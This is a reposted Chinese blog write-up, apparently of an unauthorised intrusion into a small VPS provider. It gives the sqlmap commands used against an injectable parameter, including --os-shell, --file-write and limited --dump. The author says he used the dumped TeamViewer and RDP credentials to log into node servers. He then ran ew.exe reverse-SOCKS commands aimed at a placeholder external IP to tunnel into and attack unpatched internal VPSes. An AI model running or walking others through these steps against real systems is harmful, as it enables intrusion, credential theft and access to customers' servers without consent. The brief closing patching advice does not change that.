黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

对某VPS厂商的一次渗透测试

2018-8-10 15:17| 投稿: xiaotiger |来自: 互联网

摘要: 前言今天要给大家分享一个比较有意思的故事,由于有时候我们需要频繁的换IP来做一些事情,所以这就需要用到动态拨号VPS了,然后就google搜了一波,就发生了以下的事情,请听我慢慢叙来。0x01 信息踩点看到这个网站以 ...

前言

今天要给大家分享一个比较有意思的故事,由于有时候我们需要频繁的换IP来做一些事情,所以这就需要用到动态拨号VPS了,然后就google搜了一波,就发生了以下的事情,请听我慢慢叙来。

0x01 信息踩点

看到这个网站以后,首先就猜到肯定会有漏洞....

为了避免被各位表哥爆菊花,打码有点严重,还请见谅。

我们先简单分析一下网站有没有WAF,很简单,找一个有ID参数的地方,尝试注入看看,如果有waf一般都会拦截。

经过测试发现这个小idc厂商明显没有WAF,那么直接先上awvs扫描看看。

打开awvs,然后点击new scan,在url里面填上目标的域名,一直下一步就行。

喝杯茶的功夫,我们awvs扫描完成了,高危漏洞还真多,见下图。

xss漏洞试过了,半天没上钩我就直接去注入了。

我们点开一个扫描出来的注入漏洞,点开参数,然后在右边点开 View HTTP headers 可以看到一个请求包,把他复制到c盘下,文件名为1.txt。

0x02 sqlmap跑起来

打开sqlmap 输入

sqlmap.py -r c:\1.txt

第一个跑不出来,又换了其他注入点跑。

最后发现有个地方的确存在注入

系统版本和mysql版本都出来了。

--dbs查了下,发现好几个库。

--privileges查看一下权限,root权限,那么可以尝试写入shell试试。

执行写shell语句

会让你选择一种脚本格式,默认回车就行了。

sqlmap.py -r c:\1.txt --os-shell

然后这里可以指定网站的路径或者自动识别。

网站的路径我是通过访问他一个不存在的文件报错得到的。

得到的路径以后,在sqlmap里面选择2 然后输入路径e:/xxxx/ 回车

上图可以发现报错了,具体原因我也不太清楚,根据群里各位表哥的意见,mysql5.0以上默认是开启安全模式的,也就是说不能写文件。

但是我用“王子表哥”提供的语句查询到返回值是"Y"应该说是可以写入的?

查询写入权限的语句如下,如果当前用户有写入权限的话,会返回"Y"

SELECT file_priv FROM mysql.user WHEREuser= root

然后通过--file-write写本地文件也失败了。

--file-write c:/log.txt -–file-dest e:/1.txt;

将本地的c盘下logt.txt文件写入到目标的e盘下1.txt)

0x03 这逼没法装了

正当我一筹莫展的时候,才想起他数据库里的信息还没看,然后我们挨个表查看下数据。

小提示:如果不想dump出表里面所有的内容,可以用以下语句控制dump出的数量

以下语句可以控制导出表里面的10条内容。

sqlmap.py -r c:\1.txt -D "数据库名称" -T "表名称" -C "" --dump --start 1 --stop 10

不过蛋疼的是,查了所有表也没看到有管理员的相关信息,但是发现一个东西有点意思,哈哈,见下图。

在sqlmap里面太乱了,看不清楚,我们进入dump的目录找到这个文件。

目录一般是在这里

C:\Users\Administrator\.sqlmap\output\目标url\dump\freeradius

notepad++打开后还是不太明了,所以我们用excel打开。

但是发现用excel打开后好多中文的地方变成了乱码,这是因为编码问题。

我们在这个csv文件上右键,用notepad++打开,然后编码转换成utf-8。

现在我们重新打开整理一下无用的数据

0x04 成功撸穿厂商

你没有看错,这个表里面竟然存放了这个VPS厂商的所有节点服务器的信息。

其中有TV的ID和密码,还有3389的ip 账号和密码。

科普下。TV的意思猜一下就知道是TeamViewer 一个远程控制软件,只要有对方的ID和密码就可以控制对方的电脑。

为了验证这些tv的密码是不是真的可以用,我们本地安装上tv试试。

安装好了以后打开,输入对方的ID,然后点击连接。

然后输入密码看看。

我们可以看到,已经连接成功了。

你的vps当前的配置,还有你在干什么人家都知道啦,哈哈。

另外尝试了几个3389的服务器也是可以登陆的,发现超多的vps运行在上面。

用的hyper-v管理

我们进入一台vps发现都是内网IP,那么反弹个代理出来看看。

本地先监听888端口

ew.exe -s rcsocks -l 1008 -e 888

然后在一台vps上执行

ew.exe -s rssocks -d 2.2.2.2 -e 888

说明:2.2.2.2为你的外网IP,或者填你服务器IP。888是你的端口号(注意防火墙要放行)

成功以后用SocksCap64添加代理

测试没问题以后,把工具放进代理里面直接横向干内网。

内网很多VPS都没有打补丁,一打一个准,都是些刷点击的、刷单的、刷访问量的。

就不继续深入了.....

如果要查水表,这个锅我不背,因为我发现部分服务器上有黑客留下的工具,说明这些服务器都被人玩坏了。

总结

1、表哥们购买vps的时候,尽量不要选择国内的,你干啥人家都知道。

2、如果买的是windows的vps,一定要打补丁、打补丁、打补丁。

3、如果你很帅,请回复点赞,谢谢。

作者:jasonx 转载:i春秋社区


小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/i6587754547551142407/

免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部